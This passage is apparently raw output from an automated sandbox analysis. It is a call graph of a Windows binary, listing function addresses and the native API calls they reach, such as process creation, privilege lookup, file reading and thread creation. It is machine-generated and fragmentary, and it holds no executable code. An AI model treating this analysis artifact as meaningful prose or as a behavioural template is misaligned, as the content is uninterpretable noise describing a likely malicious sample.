33812->33813 33815 f459b0 33813->33815 33932 f453f0 LdrLoadDll NtReadFile NtClose 33814->33932 33815->33781 33817 f459d2 33817->33781 33819 f45919 33818->33819 33821 f458c1 33818->33821 33819->33812 33820 f4592c 33819->33820 33925 f4a2a0 33820->33925 33823 f458c6 33821->33823 33824 f458da 33821->33824 33924 f452b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33823->33924 33825 f458f7 33824->33825 33826 f458df 33824->33826 33825->33815 33881 f45070 33825->33881 33869 f45350 33826->33869 33831 f458d0 33831->33781 33832 f458ed 33832->33781 33834 f4598c 33929 f4a450 33834->33929 33835 f4590f 33835->33781 33837 f45998 33837->33781 33839 f4b17b 33838->33839 33840 f4b18d 33839->33840 33841 f4be70 2 API calls 33839->33841 33840->33784 33842 f4b1ad 33841->33842 33952 f44cd0 33842->33952 33844 f4b1d0 33844->33840 33845 f44cd0 3 API calls 33844->33845 33847 f4b1f2 33845->33847 33847->33840 33984 f45ff0 33847->33984 33848 f4b27a 33849 f4b28a 33848->33849 34079 f4aef0 LdrLoadDll 33848->34079 33995 f4ad60 33849->33995 33852 f4b2b8 34074 f49e80 33852->34074 33856 f4af70 LdrLoadDll 33855->33856 33857 f49edc 33856->33857 34102 51e967a 33857->34102 33858 f49ef7 33860 f4bef0 33858->33860 34105 f4a630 33860->34105 33862 f4b3c9 33862->33746 33864 f4af70 LdrLoadDll 33863->33864 33865 f457a4 33864->33865 33865->33804 33865->33805 33865->33808 33867 f4a33c NtCreateFile 33866->33867 33868 f4af70 LdrLoadDll 33866->33868 33867->33809 33868->33867 33870 f4536c 33869->33870 33871 f4a2a0 LdrLoadDll 33870->33871 33872 f4538d 33871->33872 33873 f45394 33872->33873 33874 f453a8 33872->33874 33875 f4a450 2 API calls 33873->33875 33876 f4a450 2 API calls 33874->33876 33878 f4539d 33875->33878 33877 f453b1 33876->33877 33933 f4c100 33877->33933 33878->33832 33880 f453bc 33880->33832 33882 f450ee 33881->33882 33883 f450bb 33881->33883 33885 f45239 33882->33885 33889 f4510a 33882->33889 33884 f4a2a0 LdrLoadDll 33883->33884 33886 f450d6 33884->33886 33887 f4a2a0 LdrLoadDll 33885->33887 33888 f4a450 2 API calls 33886->33888 33891 f45254 33887->33891 33890 f450df 33888->33890 33892 f4a2a0 LdrLoadDll 33889->33892 33890->33835 33951 f4a2e0 LdrLoadDll 33891->33951 33893 f45125 33892->33893 33895 f45141 33893->33895 33896 f4512c 33893->33896 33897 f45146 33895->33897 33898 f4515c 33895->33898 33900 f4a450 2 API calls 33896->33900 33902 f4a450 2 API calls 33897->33902 33909 f45161 33898->33909 33939 f4c0c0 33898->33939 33899 f4528e 33903 f4a450 2 API calls 33899->33903 33901 f45135 33900->33901 33901->33835 33905 f4514f 33902->33905 33904 f45299 33903->33904 33904->33835 33905->33835 33908 f451c7 33910 f451de 33908->33910 33950 f4a260 LdrLoadDll 33908->33950 33916 f45173 33909->33916 33942 f4a3d0 33909->33942 33912 f451e5 33910->33912 33913 f451fa 33910->33913 33914 f4a450 2 API calls 33912->33914 33915 f4a450 2 API calls 33913->33915 33914->33916 33917 f45203 33915->33917 33916->33835 33918 f4522f 33917->33918 33945 f4bcc0 33917->33945 33918->33835 33920 f4521a 33921 f4bef0 2 API calls 33920->33921 33922 f45223 33921->33922 33922->33835 33923->33808 33924->33831 33926 f4af70 LdrLoadDll 33925->33926 33927 f45974 33926->33927 33928 f4a2e0 LdrLoadDll 33927->33928 33928->33834 33930 f4af70 LdrLoadDll 33929->33930 33931 f4a46c NtClose 33930->33931 33931->33837 33932->33817 33935 f4c11a 33933->33935 33936 f4a5f0 33933->33936 33935->33880 33937 f4af70 LdrLoadDll 33936->33937 33938 f4a60c RtlAllocateHeap 33937->33938 33938->33935 33940 f4a5f0 2 API calls 33939->33940 33941 f4c0d8 33940->33941 33941->33909 33943 f4af70 LdrLoadDll 33942->33943 33944 f4a3ec NtReadFile 33943->33944 33944->33908 33946 f4bce4 33945->33946 33947 f4bccd 33945->33947 33946->33920 33947->33946 33948 f4c0c0 2 API calls 33947->33948 33949 f4bcfb 33948->33949 33949->33920 33950->33910 33951->33899 33953 f44ce1 33952->33953 33954 f44ce9 33952->33954 33953->33844 33983 f44fbc 33954->33983 34080 f4d0a0 33954->34080 33956 f44d3d 33957 f4d0a0 2 API calls 33956->33957 33961 f44d48 33957->33961 33958 f44d96 33960 f4d0a0 2 API calls 33958->33960 33964 f44daa 33960->33964 33961->33958 33962 f4d1d0 3 API calls 33961->33962 34094 f4d140 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33961->34094 33962->33961 33963 f44e07 33965 f4d0a0 2 API calls 33963->33965 33964->33963 34085 f4d1d0 33964->34085 33966 f44e1d 33965->33966 33968 f44e5a 33966->33968 33970 f4d1d0 3 API calls 33966->33970 33969 f4d0a0 2 API calls 33968->33969 33971 f44e65 33969->33971 33970->33966 33972 f4d1d0 3 API calls 33971->33972 33979 f44e9f 33971->33979 33972->33971 33975 f4d100 2 API calls 33976 f44f9e 33975->33976 33977 f4d100 2 API calls 33976->33977 33978 f44fa8 33977->33978 33980 f4d100 2 API calls 33978->33980 34091 f4d100 33979->34091 33981 f44fb2 33980->33981 33982 f4d100 2 API calls 33981->33982 33982->33983 33983->33844 33985 f46001 33984->33985 33986 f456b0 8 API calls 33985->33986 33991 f46017 33986->33991 33987 f46020 33987->33848 33988 f46057 33989 f4bef0 2 API calls 33988->33989 33990 f46068 33989->33990 33990->33848 33991->33987 33991->33988 33992 f460a3 33991->33992 33993 f4bef0 2 API calls 33992->33993 33994 f460a8 33993->33994 33994->33848 34095 f4abf0 33995->34095 33997 f4ad74 33998 f4abf0 LdrLoadDll 33997->33998 33999 f4ad7d 33998->33999 34000 f4abf0 LdrLoadDll 33999->34000 34001 f4ad86 34000->34001 34002 f4abf0 LdrLoadDll 34001->34002 34003 f4ad8f 34002->34003 34004 f4abf0 LdrLoadDll 34003->34004 34005 f4ad98 34004->34005 34006 f4abf0 LdrLoadDll 34005->34006 34007 f4ada1 34006->34007 34008 f4abf0 LdrLoadDll 34007->34008 34009 f4adad 34008->34009 34010 f4abf0 LdrLoadDll 34009->34010 34011 f4adb6 34010->34011 34012 f4abf0 LdrLoadDll 34011->34012 34013 f4adbf 34012->34013 34014 f4abf0 LdrLoadDll 34013->34014 34015 f4adc8 34014->34015 34016 f4abf0 LdrLoadDll 34015->34016 34017 f4add1 34016->34017 34018 f4abf0 LdrLoadDll 34017->34018 34019 f4adda 34018->34019 34020 f4abf0 LdrLoadDll 34019->34020 34021 f4ade6 34020->34021 34022 f4abf0 LdrLoadDll 34021->34022 34023 f4adef 34022->34023 34024 f4abf0 LdrLoadDll 34023->34024 34025 f4adf8 34024->34025 34026 f4abf0 LdrLoadDll 34025->34026 34027 f4ae01 34026->34027 34028 f4abf0 LdrLoadDll 34027->34028 34029 f4ae0a 34028->34029 34030 f4abf0 LdrLoadDll 34029->34030 34031 f4ae13 34030->34031 34032 f4abf0 LdrLoadDll 34031->34032 34033 f4ae1f 34032->34033 34034 f4abf0 LdrLoadDll 34033->34034 34035 f4ae28 34034->34035 34036 f4abf0 LdrLoadDll 34035->34036 34037 f4ae31 34036->34037 34038 f4abf0 LdrLoadDll 34037->34038 34039 f4ae3a 34038->34039 34040 f4abf0 LdrLoadDll 34039->34040 34041 f4ae43 34040->34041 34042 f4abf0 LdrLoadDll 34041->34042 34043 f4ae4c 34042->34043 34044 f4abf0 LdrLoadDll 34043->34044 34045 f4ae58 34044->34045 34046 f4abf0 LdrLoadDll 34045->34046 34047 f4ae61 34046->34047 34048 f4abf0 LdrLoadDll 34047->34048 34049 f4ae6a 34048->34049 34050 f4abf0 LdrLoadDll 34049->34050 34051 f4ae73 34050->34051 34052 f4abf0 LdrLoadDll 34051->34052 34053 f4ae7c 34052->34053 34054 f4abf0 LdrLoadDll 34053->34054 34055 f4ae85 34054->34055 34056 f4abf0 LdrLoadDll 34055->34056 34057 f4ae91 34056->34057 34058 f4abf0 LdrLoadDll 34057->34058 34059 f4ae9a 34058->34059 34060 f4abf0 LdrLoadDll 34059->34060 34061 f4aea3 34060->34061 34062 f4abf0 LdrLoadDll 34061->34062 34063 f4aeac 34062->34063 34064 f4abf0 LdrLoadDll 34063->34064 34065 f4aeb5 34064->34065 34066 f4abf0 LdrLoadDll 34065->34066 34067 f4aebe 34066->34067 34068 f4abf0 LdrLoadDll 34067->34068 34069 f4aeca 34068->34069 34070 f4abf0 LdrLoadDll 34069->34070 34071 f4aed3 34070->34071 34072 f4abf0 LdrLoadDll 34071->34072 34073 f4aedc 34072->34073 34073->33852 34075 f4af70 LdrLoadDll 34074->34075 34076 f49e9c 34075->34076 34101 51e9860 LdrInitializeThunk 34076->34101 34077 f49eb3 34077->33784 34079->33849 34081 f4d0b6 34080->34081 34082 f4d0b0 34080->34082 34083 f4c0c0 2 API calls 34081->34083 34082->33956 34084 f4d0dc 34083->34084 34084->33956 34086 f4d140 34085->34086 34087 f4c0c0 2 API calls 34086->34087 34088 f4d19d 34086->34088 34089 f4d17a 34087->34089 34088->33964 34090 f4bef0 2 API calls 34089->34090 34090->34088 34092 f44f94 34091->34092 34093 f4bef0 2 API calls 34091->34093 34092->33975 34093->34092 34094->33961 34096 f4ac0b 34095->34096 34097 f45ab0 LdrLoadDll 34096->34097 34098 f4ac2b 34097->34098 34099 f45ab0 LdrLoadDll 34098->34099 34100 f4acdf 34098->34100 34099->34100 34100->33997 34100->34100 34101->34077 34103 51e968f LdrInitializeThunk 34102->34103 34104 51e9681 34102->34104 34103->33858 34104->33858 34106 f4af70 LdrLoadDll 34105->34106 34107 f4a64c RtlFreeHeap 34106->34107 34107->33862 34109 f37230 34108->34109 34110 f3722b 34108->34110 34111 f4be70 2 API calls 34109->34111 34110->33792 34118 f37255 34111->34118 34112 f372b8 34112->33792 34113 f49e80 2 API calls 34113->34118 34114 f372be 34115 f372e4 34114->34115 34117 f4a580 2 API calls 34114->34117 34115->33792 34119 f372d5 34117->34119 34118->34112 34118->34113 34118->34114 34120 f4be70 2 API calls 34118->34120 34124 f4a580 34118->34124 34119->33792 34120->34118 34122 f4a580 2 API calls 34121->34122 34123 f374fe 34122->34123 34123->33748 34125 f4af70 LdrLoadDll 34124->34125 34126 f4a59c 34125->34126 34129 51e96e0 LdrInitializeThunk 34126->34129 34127 f4a5b3 34127->34118 34129->34127 34131 f4b633 34130->34131 34132 f3a150 LdrLoadDll 34131->34132 34133 f3907a 34132->34133 34133->33755 34135 f3a4c3 34134->34135 34137 f3a540 34135->34137 34150 f49c50 LdrLoadDll 34135->34150 34137->33762 34139 f4af70 LdrLoadDll 34138->34139 34140 f3d5bb 34139->34140 34140->33765 34141 f4a790 34140->34141 34142 f4af70 LdrLoadDll 34141->34142 34143 f4a7af LookupPrivilegeValueW 34142->34143 34143->33767 34145 f4a22e 34144->34145 34146 f4af70 LdrLoadDll 34145->34146 34147 f4a23c 34146->34147 34151 51e9910 LdrInitializeThunk 34147->34151 34148 f4a25b 34148->33768 34150->34137 34151->34148 34153 f3a647 34152->34153 34154 f3a4a0 LdrLoadDll 34153->34154 34155 f3a676 34154->34155 34155->33707 34157 f3a394 34156->34157 34212 f49c50 LdrLoadDll 34157->34212 34159 f3a3ce 34159->33709 34161 f3d7ac 34160->34161 34162 f3a620 LdrLoadDll 34161->34162 34163 f3d7be 34162->34163 34213 f3d690 34163->34213 34166 f3d7f1 34170 f4a450 2 API calls 34166->34170 34171 f3d802 34166->34171 34167 f3d7d9 34168 f4a450 2 API calls 34167->34168 34169 f3d7e4 34167->34169 34168->34169 34169->33713 34170->34171 34171->33713 34173 f3b4f6 34172->34173 34174 f3b500 34172->34174 34173->33721 34175 f3a4a0 LdrLoadDll 34174->34175 34176 f3b571 34175->34176 34177 f3a370 LdrLoadDll 34176->34177 34178 f3b585 34177->34178 34179 f3b5a8 34178->34179 34180 f3a4a0 LdrLoadDll 34178->34180 34179->33721 34181 f3b5c4 34180->34181 34182 f456b0 8 API calls 34181->34182 34183 f3b619 34182->34183 34183->33721 34185 f3c076 34184->34185 34186 f3a4a0 LdrLoadDll 34185->34186 34187 f3c08a 34186->34187 34232 f3bd40 34187->34232 34189 f3859c 34210 f3b630 LdrLoadDll 34189->34210 34262 f3da40 34190->34262 34192 f38441 34192->33733 34193 f38243 34193->34192 34267 f45000 34193->34267 34195 f382a2 34195->34192 34270 f37fe0 34195->34270 34198 f4d0a0 2 API calls 34199 f382e9 34198->34199 34200 f4d1d0 3 API calls 34199->34200 34202 f382fe 34200->34202 34201 f37220 4 API calls 34207 f38350 34201->34207 34202->34207 34345 f33660 10 API calls 34202->34345 34207->34192 34207->34201 34208 f374e0 2 API calls 34207->34208 34275 f3b210 34207->34275 34325 f3d9e0 34207->34325 34329 f3d4c0 34207->34329 34208->34207 34209->33711 34210->33726 34211->33731 34212->34159 34214 f3d6aa 34213->34214 34215 f3d760 34213->34215 34216 f3a4a0 LdrLoadDll 34214->34216 34215->34166 34215->34167 34217 f3d6cc 34216->34217 34223 f49f00 34217->34223 34219 f3d70e 34226 f49f40 34219->34226 34222 f4a450 2 API calls 34222->34215 34224 f4af70 LdrLoadDll 34223->34224 34225 f49f1c 34223->34225 34224->34225 34225->34219 34227 f4af70 LdrLoadDll 34226->34227 34228 f49f5c 34227->34228 34231 51e9fe0 LdrInitializeThunk 34228->34231 34229 f3d754 34229->34222 34231->34229 34233 f3bd57 34232->34233 34241 f3da80 34233->34241 34237 f3bdcb 34238 f3bdd2 34237->34238 34253 f4a260 LdrLoadDll 34237->34253 34238->34189 34240 f3bde5 34240->34189 34242 f3daa5 34241->34242 34254 f37520 34242->34254 34244 f3dac9 34245 f456b0 8 API calls 34244->34245 34246 f3bd9f 34244->34246 34248 f4bef0 2 API calls 34244->34248 34261 f3d8c0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 34244->34261 34245->34244 34249 f4a6a0 34246->34249 34248->34244 34250 f4af70 LdrLoadDll 34249->34250 34251 f4a6bf CreateProcessInternalW 34250->34251 34251->34237 34253->34240 34255 f3761f 34254->34255 34256 f37535 34254->34256 34255->34244 34256->34255 34257 f456b0 8 API calls 34256->34257 34258 f375a2 34257->34258 34259 f4bef0 2 API calls 34258->34259 34260 f375c9 34258->34260 34259->34260 34260->34244 34261->34244 34263 f45ab0 LdrLoadDll 34262->34263 34264 f3da5f 34263->34264 34265 f3da66 SetErrorMode 34264->34265 34266 f3da6d 34264->34266 34265->34266 34266->34193 34346 f3d810 34267->34346 34269 f45026 34269->34195 34271 f4be70 2 API calls 34270->34271 34274 f38005 34271->34274 34272 f38220 34272->34198 34274->34272 34365 f49840 34274->34365 34276 f3b22f 34275->34276 34277 f3b229 34275->34277 34422 f38c30 34276->34422 34413 f3d2d0 34277->34413 34280 f3b23c 34281 f3b4d2 34280->34281 34282 f4d1d0 3 API calls 34280->34282 34281->34207 34283 f3b258 34282->34283 34284 f3b26c 34283->34284 34285 f3d9e0 2 API calls 34283->34285 34431 f49cd0 34284->34431 34285->34284 34288 f3b3a0 34447 f3b1b0 LdrLoadDll LdrInitializeThunk 34288->34447 34289 f49ec0 2 API calls 34290 f3b2ea 34289->34290 34290->34288 34296 f3b2f6 34290->34296 34292 f3b3bf 34293 f3b3c7 34292->34293 34448 f3b120 LdrLoadDll NtClose LdrInitializeThunk 34292->34448 34294 f4a450 2 API calls 34293->34294 34297 f3b3d1 34294->34297 34296->34281 34299 f3b349 34296->34299 34302 f49fd0 2 API calls 34296->34302 34297->34207 34298 f3b3e9 34298->34293 34301 f3b3f0 34298->34301 34300 f4a450 2 API calls 34299->34300 34303 f3b366 34300->34303 34304 f3b408 34301->34304 34449 f3b0a0 LdrLoadDll LdrInitializeThunk 34301->34449 34302->34299 34434 f492f0 34303->34434 34450 f49d50 LdrLoadDll 34304->34450 34308 f3b37d 34308->34281 34437 f37690 34308->34437 34309 f3b41c 34451 f3af20 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34309->34451 34312 f3b440 34314 f3b48d 34312->34314 34452 f49d80 LdrLoadDll 34312->34452 34454 f49de0 LdrLoadDll 34314->34454 34317 f3b45e 34317->34314 34453 f49e10 LdrLoadDll 34317->34453 34318 f3b49b 34319 f4a450 2 API calls 34318->34319 34320 f3b4a5 34319->34320 34322 f4a450 2 API calls 34320->34322 34323 f3b4af 34322->34323 34323->34281 34324 f37690 3 API calls 34323->34324 34324->34281 34326 f3d9f3 34325->34326 34528 f49e50 34326->34528 34330 f3d4d0 34329->34330 34332 f3d508 34329->34332 34330->34332 34340 f3d4ff 34330->34340 34534 f3c340 34330->34534 34331 f3d523 34569 f3d1f0 34331->34569 34332->34331 34344 f3d558 34332->34344 34591 f3d270 11 API calls 34332->34591 34339 f3d567 34339->34207 34549 f3d320 34340->34549 34343 f456b0 8 API calls 34343->34344 34592 f34750 28 API calls 34344->34592 34345->34207 34347 f3d82d 34346->34347 34353 f49f80 34347->34353 34350 f3d875 34350->34269 34354 f4af70 LdrLoadDll 34353->34354 34355 f49f9c 34354->34355 34363 51e99a0 LdrInitializeThunk 34355->34363 34356 f3d86e 34356->34350 34358 f49fd0 34356->34358 34359 f4af70 LdrLoadDll 34358->34359 34360 f49fec 34359->34360 34364 51e9780 LdrInitializeThunk 34360->34364 34361 f3d89e 34361->34269 34363->34356 34364->34361 34366 f4c0c0 2 API calls 34365->34366 34367 f49857 34366->34367 34386 f38770 34367->34386 34369 f49872 34370 f498b0 34369->34370 34371 f49899 34369->34371 34374 f4be70 2 API calls 34370->34374 34372 f4bef0 2 API calls 34371->34372 34373 f498a6 34372->34373 34373->34272 34375 f498ea 34374->34375 34376 f4be70 2 API calls 34375->34376 34377 f49903 34376->34377 34383 f49ba4 34377->34383 34392 f4beb0 LdrLoadDll 34377->34392 34379 f49b89 34380 f49b90 34379->34380 34379->34383 34381 f4bef0 2 API calls 34380->34381 34382 f49b9a 34381->34382 34382->34272 34384 f4bef0 2 API calls 34383->34384 34385 f49bf9 34384->34385 34385->34272 34387 f38795 34386->34387 34388 f3a150 LdrLoadDll 34387->34388 34389 f387c8 34388->34389 34391 f387ed 34389->34391 34393 f3b950 34389->34393 34391->34369 34392->34379 34394 f3b97c 34393->34394 34395 f4a1a0 LdrLoadDll 34394->34395 34396 f3b995 34395->34396 34397 f3b99c 34396->34397 34404 f4a1e0 34396->34404 34397->34391 34401 f3b9d7 34402 f4a450 2 API calls 34401->34402 34403 f3b9fa 34402->34403 34403->34391 34405 f4af70 LdrLoadDll 34404->34405 34406 f4a1fc 34405->34406 34412 51e9710 LdrInitializeThunk 34406->34412 34407 f3b9bf 34407->34397 34409 f4a7d0 34407->34409 34410 f4af70 LdrLoadDll 34409->34410 34411 f4a7ef 34410->34411 34411->34401 34412->34407 34455 f3c3c0 34413->34455 34415 f3d2e7 34421 f3d300 34415->34421 34468 f34000 34415->34468 34417 f4c0c0 2 API calls 34419 f3d30e 34417->34419 34418 f3d2fa 34495 f49170 34418->34495 34419->34276 34421->34417 34423 f38c4b 34422->34423 34424 f3d690 3 API calls 34423->34424 34430 f38d6b 34423->34430 34425 f38d4c 34424->34425 34426 f38d7a 34425->34426 34427 f4a450 2 API calls 34425->34427 34429 f38d61 34425->34429 34426->34280 34427->34429 34527 f36290 LdrLoadDll 34429->34527 34430->34280 34432 f4af70 LdrLoadDll 34431->34432 34433 f3b2c0 34432->34433 34433->34281 34433->34288 34433->34289 34435 f3d9e0 2 API calls 34434->34435 34436 f49322 34435->34436 34436->34308 34438 f376a8 34437->34438 34439 f3a150 LdrLoadDll 34438->34439 34440 f376c3 34439->34440 34441 f45ab0 LdrLoadDll 34440->34441 34442 f376d3 34441->34442 34443 f3770d 34442->34443 34444 f376dc PostThreadMessageW 34442->34444 34443->34207 34444->34443 34445 f376f0 34444->34445 34446 f376fa PostThreadMessageW 34445->34446 34446->34443 34447->34292 34448->34298 34449->34304 34450->34309 34451->34312 34452->34317 34453->34314 34454->34318 34456 f3c3f3 34455->34456 34500 f3a760 34456->34500 34458 f3c405 34504 f3a8d0 34458->34504 34460 f3c423 34461 f3a8d0 LdrLoadDll 34460->34461 34462 f3c439 34461->34462 34463 f3d810 3 API calls 34462->34463 34464 f3c45d 34463->34464 34465 f3c464 34464->34465 34466 f4c100 2 API calls 34464->34466 34465->34415 34467 f3c474 34466->34467 34467->34415 34469 f3402c 34468->34469 34470 f3b950 3 API calls 34469->34470 34472 f34103 34470->34472 34471 f34695 34471->34418 34472->34471 34507 f4c140 34472->34507 34474 f3416e 34475 f3a4a0 LdrLoadDll 34474->34475 34476 f342f4 34475->34476 34477 f3a4a0 LdrLoadDll 34476->34477 34478 f34318 34477->34478 34511 f3ba10 34478->34511 34482 f343b3 34483 f34479 34482->34483 34484 f3ba10 2 API calls 34482->34484 34486 f4be70 2 API calls 34483->34486 34485 f34452 34484->34485 34485->34483 34488 f4a0e0 2 API calls 34485->34488 34487 f344e6 34486->34487 34489 f4be70 2 API calls 34487->34489 34488->34483 34490 f344ff 34489->34490 34490->34471 34491 f3a4a0 LdrLoadDll 34490->34491 34492 f34547 34491->34492 34493 f3a370 LdrLoadDll 34492->34493 34494 f345f9 34493->34494 34494->34418 34496 f45ab0 LdrLoadDll 34495->34496 34497 f49191 34496->34497 34498 f491b7 34497->34498 34499 f491a4 CreateThread 34497->34499 34498->34421 34499->34421 34501 f3a787 34500->34501 34502 f3a4a0 LdrLoadDll 34501->34502 34503 f3a7c3 34502->34503 34503->34458 34505 f3a4a0 LdrLoadDll 34504->34505 34506 f3a8e9 34505->34506 34506->34460 34508 f4c14d 34507->34508 34509 f45ab0 LdrLoadDll 34508->34509 34510 f4c160 34509->34510 34510->34474 34512 f3ba35 34511->34512 34520 f4a050 34512->34520 34515 f4a0e0 34516 f4af70 LdrLoadDll 34515->34516 34517 f4a0fc 34516->34517 34526 51e9650 LdrInitializeThunk 34517->34526 34518 f4a11b 34518->34482 34521 f4af70 LdrLoadDll 34520->34521 34522 f4a06c 34521->34522 34525 51e96d0 LdrInitializeThunk 34522->34525 34523 f3438c 34523->34482 34523->34515 34525->34523 34526->34518 34527->34430 34529 f4af70 LdrLoadDll 34528->34529 34530 f49e6c 34529->34530 34533 51e9840 LdrInitializeThunk 34530->34533 34531 f3da1e 34531->34207 34533->34531 34535 f3c3b5 34534->34535 34536 f3c350 34534->34536 34535->34340 34536->34535 34593 f3d620 34536->34593 34538 f3c360 34539 f456b0 8 API calls 34538->34539 34540 f3c371 34539->34540 34541 f456b0 8 API calls 34540->34541 34542 f3c37c 34541->34542 34543 f3c38a 34542->34543 34601 f3be00 34542->34601 34545 f456b0 8 API calls 34543->34545 34546 f3c398 34545->34546 34547 f456b0 8 API calls 34546->34547 34548 f3c3a3 34547->34548 34548->34340 34550 f3d350 34549->34550 34652 f449d0 34550->34652 34552 f3d391 34690 f436c0 34552->34690 34554 f3d397 34726 f408e0 34554->34726 34556 f3d39d 34749 f427b0 34556->34749 34558 f3d3a5 34781 f439e0 34558->34781 34562 f3d3b1 34815 f44050 34562->34815 34564 f3d3b7 34841 f3f120 34564->34841 34566 f3d3cf 34852 f3f2f0 34566->34852 34570 f3d208 34569->34570 34574 f3d259 34569->34574 34571 f3f6d0 8 API calls 34570->34571 34570->34574 34572 f3d243 34571->34572 34572->34574 35066 f3f920 11 API calls 34572->35066 34574->34339 34575 f3d030 34574->34575 34576 f3d04c 34575->34576 34581 f3d12b 34575->34581 34579 f4a450 2 API calls 34576->34579 34576->34581 34577 f3d1c1 34578 f3d1de 34577->34578 34580 f456b0 8 API calls 34577->34580 34578->34343 34578->34344 34582 f3d067 34579->34582 34580->34578 34581->34577 35067 f3bb80 34581->35067 34585 f3bb80 4 API calls 34582->34585 34584 f3d19b 34584->34577 34587 f3be00 5 API calls 34584->34587 34586 f3d09f 34585->34586 34588 f3a4a0 LdrLoadDll 34586->34588 34587->34577 34589 f3d0b0 34588->34589 34590 f3a4a0 LdrLoadDll 34589->34590 34590->34581 34591->34331 34592->34339 34594 f4a1a0 LdrLoadDll 34593->34594 34595 f3d647 34594->34595 34596 f3d64e 34595->34596 34597 f4a1e0 2 API calls 34595->34597 34596->34538 34598 f3d66c 34597->34598 34599 f4a450 2 API calls 34598->34599 34600 f3d678 34599->34600 34600->34538 34602 f3be25 34601->34602 34603 f3be33 34602->34603 34604 f3be47 34602->34604 34605 f3a4a0 LdrLoadDll 34603->34605 34606 f3a4a0 LdrLoadDll 34604->34606 34608 f3be42 34605->34608 34607 f3be56 34606->34607 34610 f3b950 3 API calls 34607->34610 34609 f3a4a0 LdrLoadDll 34608->34609 34611 f3c044 34608->34611 34612 f3beb6 34609->34612 34610->34608 34611->34543 34613 f3a4a0 LdrLoadDll 34612->34613 34614 f3bee7 34613->34614 34615 f3bfe0 34614->34615 34617 f3ba10 2 API calls 34614->34617 34616 f3ba10 2 API calls 34615->34616 34618 f3bff9 34616->34618 34619 f3bf0a 34617->34619 34642 f3bac0 34618->34642 34621 f3bf15 34619->34621 34622 f3bfbf 34619->34622 34623 f4a450 2 API calls 34621->34623 34626 f3a4a0 LdrLoadDll 34622->34626 34624 f3bf1f 34623->34624 34628 f3a4a0 LdrLoadDll 34624->34628 34625 f4a450 2 API calls 34625->34611 34626->34615 34627 f3c009 34627->34625 34629 f3bf43 34628->34629 34630 f3ba10 2 API calls 34629->34630 34631 f3bf59 34630->34631 34632 f4a450 2 API calls 34631->34632 34633 f3bf63 34632->34633 34634 f3a4a0 LdrLoadDll 34633->34634 34635 f3bf87 34634->34635 34636 f3ba10 2 API calls 34635->34636 34637 f3bf9d 34636->34637 34638 f3bac0 2 API calls 34637->34638 34639 f3bfad 34638->34639 34640 f4a450 2 API calls 34639->34640 34641 f3bfb7 34640->34641 34641->34543 34643 f3bae4 34642->34643 34646 f4a0a0 34643->34646 34647 f4af70 LdrLoadDll 34646->34647 34648 f4a0bc 34647->34648 34651 51e9b00 LdrInitializeThunk 34648->34651 34649 f3bb6b 34649->34627 34651->34649 34653 f449f8 34652->34653 34654 f3a4a0 LdrLoadDll 34653->34654 34655 f44a27 34654->34655 34656 f3b950 3 API calls 34655->34656 34658 f44a5a 34656->34658 34657 f44a61 34657->34552 34658->34657 34659 f3a4a0 LdrLoadDll 34658->34659 34660 f44a89 34659->34660 34661 f3a4a0 LdrLoadDll 34660->34661 34662 f44aad 34661->34662 34663 f3ba10 2 API calls 34662->34663 34664 f44ad1 34663->34664 34671 f44b13 34664->34671 34864 f44330 34664->34864 34666 f44aea 34667 f44c96 34666->34667 34868 f44720 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34666->34868 34667->34552 34668 f3a4a0 LdrLoadDll 34670 f44b33 34668->34670 34672 f3ba10 2 API calls 34670->34672 34671->34668 34673 f44b57 34672->34673 34674 f44b9d 34673->34674 34676 f44b74 34673->34676 34677 f44330 8 API calls 34673->34677 34675 f3ba10 2 API calls 34674->34675 34679 f44bcd 34675->34679 34676->34667 34869 f44720 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34676->34869 34677->34676 34680 f44c13 34679->34680 34681 f44bea 34679->34681 34682 f44330 8 API calls 34679->34682 34684 f3ba10 2 API calls 34680->34684 34681->34667 34870 f44720 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34681->34870 34682->34681 34685 f44c72 34684->34685 34686 f44cbb 34685->34686 34687 f44c8f 34685->34687 34688 f44330 8 API calls 34685->34688 34686->34552 34687->34667 34871 f44720 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34687->34871 34688->34687 34691 f43724 34690->34691 34692 f3a4a0 LdrLoadDll 34691->34692 34693 f437f1 34692->34693 34694 f3b950 3 API calls 34693->34694 34696 f43824 34694->34696 34695 f4382b 34695->34554 34696->34695 34697 f3a4a0 LdrLoadDll 34696->34697 34698 f43853 34697->34698 34699 f3ba10 2 API calls 34698->34699 34700 f43893 34699->34700 34701 f439b3 34700->34701 34702 f44330 8 API calls 34700->34702 34701->34554 34703 f438b0 34702->34703 34704 f439c2 34703->34704 34872 f434e0 34703->34872 34705 f4a450 2 API calls 34704->34705 34707 f439cc 34705->34707 34707->34554 34708 f438c8 34708->34704 34709 f438d3 34708->34709 34710 f4c0c0 2 API calls 34709->34710 34711 f438fc 34710->34711 34712 f43905 34711->34712 34713 f4391b 34711->34713 34714 f4a450 2 API calls 34712->34714 34901 f433d0 CoInitialize 34713->34901 34716 f4390f 34714->34716 34716->34554 34717 f43929 34903 f4a160 34717->34903 34719 f439a2 34720 f4a450 2 API calls 34719->34720 34721 f439ac 34720->34721 34723 f4bef0 2 API calls 34721->34723 34723->34701 34724 f43947 34724->34719 34725 f4a160 2 API calls 34724->34725 34908 f43300 LdrLoadDll RtlFreeHeap 34724->34908 34725->34724 34727 f40908 34726->34727 34728 f4c0c0 2 API calls 34727->34728 34730 f40968 34728->34730 34729 f40971 34729->34556 34730->34729 34910 f405a0 34730->34910 34732 f40998 34733 f409b6 34732->34733 34945 f423a0 11 API calls 34732->34945 34738 f409d0 34733->34738 34947 f3a2a0 LdrLoadDll 34733->34947 34735 f409aa 34946 f423a0 11 API calls 34735->34946 34739 f405a0 10 API calls 34738->34739 34740 f409fb 34739->34740 34741 f40a1a 34740->34741 34948 f423a0 11 API calls 34740->34948 34743 f40a34 34741->34743 34950 f3a2a0 LdrLoadDll 34741->34950 34744 f4bef0 2 API calls 34743->34744 34747 f40a3e 34744->34747 34745 f40a0e 34949 f423a0 11 API calls 34745->34949 34747->34556 34750 f427d6 34749->34750 34751 f4286e 34750->34751 34752 f427e8 34750->34752 34757 f4284c 34751->34757 34966 f43a00 34751->34966 34753 